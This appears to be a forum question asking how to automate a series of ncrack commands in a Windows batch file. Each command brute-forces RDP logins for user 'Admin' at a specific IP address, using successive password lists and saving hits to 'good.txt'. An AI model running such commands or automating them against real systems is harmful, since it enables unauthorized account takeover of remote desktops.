How to run (OS wINDOWS -cmd.exe) multiple commands one after another, i use ncrack, commands
I open manually cmd.exe and i paste this code:
ncrack --user Admin -P pass1.txt 12.2.182.201:3389 -oN good.txt -f
When pass1.txt is finished i paste manually to cmd.exe the second command,wich contains the Pass2.txt etc...:
ncrack --user Admin -P pass1.txt 12.2.182.201:3389 -oN good.txt -f
then i paste manually to cmd , Pass.3txt
ncrack --user Admin -P pass3.txt 12.2.182.201:3389 -oN good.txt -f
How can i run all commands automatically ?in a batch file ?